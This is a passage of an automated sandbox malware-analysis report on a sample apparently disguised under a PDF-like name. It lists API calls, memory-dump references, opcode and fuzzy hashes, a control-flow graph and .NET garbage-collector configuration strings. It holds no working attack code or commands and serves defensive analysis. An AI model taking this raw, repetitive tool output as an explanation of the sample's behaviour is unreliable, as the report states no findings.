            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF773CBAC51,?,?,?,?,00007FF773C5FCD1,?,?,?,00007FF773C60254,00000000,00000020,?), ref: 00007FF773CBB62A
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF773CBB640
              • Part of subcall function 00007FF773CBB924: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF773CBB92D
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
            • String ID:
            • API String ID: 205171174-0
            • Opcode ID: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
            • Instruction ID: 17b1ab10712b70be13b5b2f40f6dadb0fb41d4a9278d0f4480f032ec19047ace
            • Opcode Fuzzy Hash: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
            • Instruction Fuzzy Hash: 3EE0E202E3950B01FDEE32B624A60B9D1800F5B7B0E9C2B30D97E652C2AD1CA8968138

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1148 7ff773c77a30-7ff773c77a64 call 7ff773c92480 1150 7ff773c77a69-7ff773c77a72 1148->1150 1151 7ff773c77a74-7ff773c77a76 1150->1151 1152 7ff773c77a82-7ff773c77a84 1150->1152 1153 7ff773c77a78-7ff773c77a80 1151->1153 1154 7ff773c77a86-7ff773c77a8a 1151->1154 1152->1154 1155 7ff773c77a8c 1152->1155 1156 7ff773c77aa5-7ff773c77aab 1153->1156 1157 7ff773c77a90-7ff773c77aa1 call 7ff773cbf5b0 1154->1157 1155->1157 1159 7ff773c77b6e-7ff773c77b83 1156->1159 1160 7ff773c77ab1-7ff773c77abb 1156->1160 1157->1156 1161 7ff773c77bad-7ff773c77bd9 call 7ff773c77cf0 1159->1161 1162 7ff773c77b85-7ff773c77b8d 1159->1162 1164 7ff773c77b69 1160->1164 1165 7ff773c77ac1-7ff773c77ac3 1160->1165 1167 7ff773c77b9c-7ff773c77bab 1162->1167 1168 7ff773c77b8f 1162->1168 1164->1159 1165->1164 1166 7ff773c77ac9-7ff773c77acf 1165->1166 1171 7ff773c77ad1-7ff773c77ae7 1166->1171 1172 7ff773c77aef-7ff773c77b24 1166->1172 1167->1161 1167->1162 1173 7ff773c77b90-7ff773c77b9a 1168->1173 1171->1172 1172->1164 1174 7ff773c77b26-7ff773c77b30 call 7ff773c61770 1172->1174 1173->1167 1173->1173 1174->1164 1177 7ff773c77b32-7ff773c77b3a 1174->1177 1177->1164 1178 7ff773c77b3c-7ff773c77b64 EnterCriticalSection LeaveCriticalSection 1177->1178 1178->1164
            APIs
              • Part of subcall function 00007FF773C92480: EnterCriticalSection.KERNEL32(?,?,?,00007FF773C77A69), ref: 00007FF773C924C4
              • Part of subcall function 00007FF773C92480: LeaveCriticalSection.KERNEL32(?,?,?,00007FF773C77A69), ref: 00007FF773C924EE
            • EnterCriticalSection.KERNEL32 ref: 00007FF773C77B43
            • LeaveCriticalSection.KERNEL32 ref: 00007FF773C77B64
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
            • Instruction ID: 76d069a1f07a81ee0a4b026a1582d1b1bda7e56573a8e8d79e942f9b0c66f59a
            • Opcode Fuzzy Hash: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
            • Instruction Fuzzy Hash: 1841BD63A3C64A81EA80AB75D841274B3A0AF04BF5F944336CD7CA72D4DF2CE05183A0
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
            • Instruction ID: 826e961ea2805d525a122c686fbf815c69c37e9f567a6298b54dc91fe9f28c97
            • Opcode Fuzzy Hash: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
            • Instruction Fuzzy Hash: 5231E133B29B6281EA54EB16940016AA3E4FB49BD4F848135DF4C37BC5DF38D462C360
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
            • Instruction ID: d6aef40a25e8b582d00839308efd7fd86b5f6e90a03217377b3057e12861c8c6
            • Opcode Fuzzy Hash: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
            • Instruction Fuzzy Hash: 69015223D3C55680F6E0B795E8842B9B794AF40790FD60132D5DD735E19F2CE4A1C7A0
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
            • Instruction ID: a06a41cf0677db154217cdf8cb5c4afb77c509dfa89f487afe57bd7c8c38c9af
            • Opcode Fuzzy Hash: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
            • Instruction Fuzzy Hash: 1AE0C275F3A501C6EB98B763A8426246292BF9AB45FC48038C80D17350DF2DA11A8B20
            APIs
            • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF773CF27CF,?,?,00000030), ref: 00007FF773CF28E2
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Initialize
            • String ID:
            • API String ID: 2538663250-0
            • Opcode ID: d725e0b3d950bfd392393c993463a472c20741fc4ae74ea19a611fc2f3cf428b
            • Instruction ID: 348467d66634e96c99a22eb1264d2a29b9d180e906e2c112bc9c65a5fd79db0f
            • Opcode Fuzzy Hash: d725e0b3d950bfd392393c993463a472c20741fc4ae74ea19a611fc2f3cf428b
            • Instruction Fuzzy Hash: F821B327F3C20754FB90FA62AC612BE93A05F54348FE44036EE4D676C7DE2CE5428220
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID:
            • API String ID: 456121617-0
            • Opcode ID: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
            • Instruction ID: 11a2bf041061e66f0f5b1bcffb93577a15523e882e8669ea97e1e8e01522b4f2
            • Opcode Fuzzy Hash: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
            • Instruction Fuzzy Hash: 82112463F38741C2EA81EA2194026B5A390AF897B4F985731EE6D637C6EF2CD4428750
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
            • String ID:
            • API String ID: 2131581837-0
            • Opcode ID: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
            • Instruction ID: 24dbf40f1dc4a0a12ae19462d3abf2a46a7ab650af1486d9e6c28a3f947eedc9
            • Opcode Fuzzy Hash: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
            • Instruction Fuzzy Hash: E3114C33A2878282DA64AF25A4051AAB760FB457B0F948339E6FE177D6DF38D0428710
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Event
            • String ID:
            • API String ID: 4201588131-0
            • Opcode ID: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
            • Instruction ID: 26572f1866f263cc21757a556455b5e20c5d2276ba8dc5ee3d6a0e07c53cfe80
            • Opcode Fuzzy Hash: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
            • Instruction Fuzzy Hash: 4FF08217F3C64242E6807B61B9C227AA3519F497A0FA85131E95D177D7CE3CE0918750
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
            • Instruction ID: 910dc24e0746e8fb5e94211e0e279a48a151d3111ef53259c090ce77895a9721
            • Opcode Fuzzy Hash: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
            • Instruction Fuzzy Hash: BDB01240F3A441C2E34437A37C4230801153B56B42FC04034DA08B1250CE1C81A50B10
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
            • API String ID: 0-799405152
            • Opcode ID: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
            • Instruction ID: b471939b2d2564c068eef818ef170bc6363c1fdf6240ad685056b24362def631
            • Opcode Fuzzy Hash: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
            • Instruction Fuzzy Hash: 3E426F22A3CA9751EBA0AB95F850AA9B3A5FF467C8FC11133D98C17B24DF3CD2158714
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: strcmp
            • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
            • API String ID: 1004003707-1294421646
            • Opcode ID: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
            • Instruction ID: b724cac0d2a61f11c0d89676ca695bb8820a90b03a69d29cc0e1bbe33fab090a
            • Opcode Fuzzy Hash: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
            • Instruction Fuzzy Hash: 1962B922E3DA87A4FA82FBE5AC400B2B761AF55794BC44177C44D67262DF3CA169C370
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID:
            • API String ID: 456121617-0
            • Opcode ID: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
            • Instruction ID: 00f634b8c9d35eb332fbc7633d80ea3948c1067d6dfda85401246ea3405deca9
            • Opcode Fuzzy Hash: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
            • Instruction Fuzzy Hash: ED72AE23A396828AEA91AB1590423B9F7A0FF45B94F9A4135CE5D277D5EF3CE450C320
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
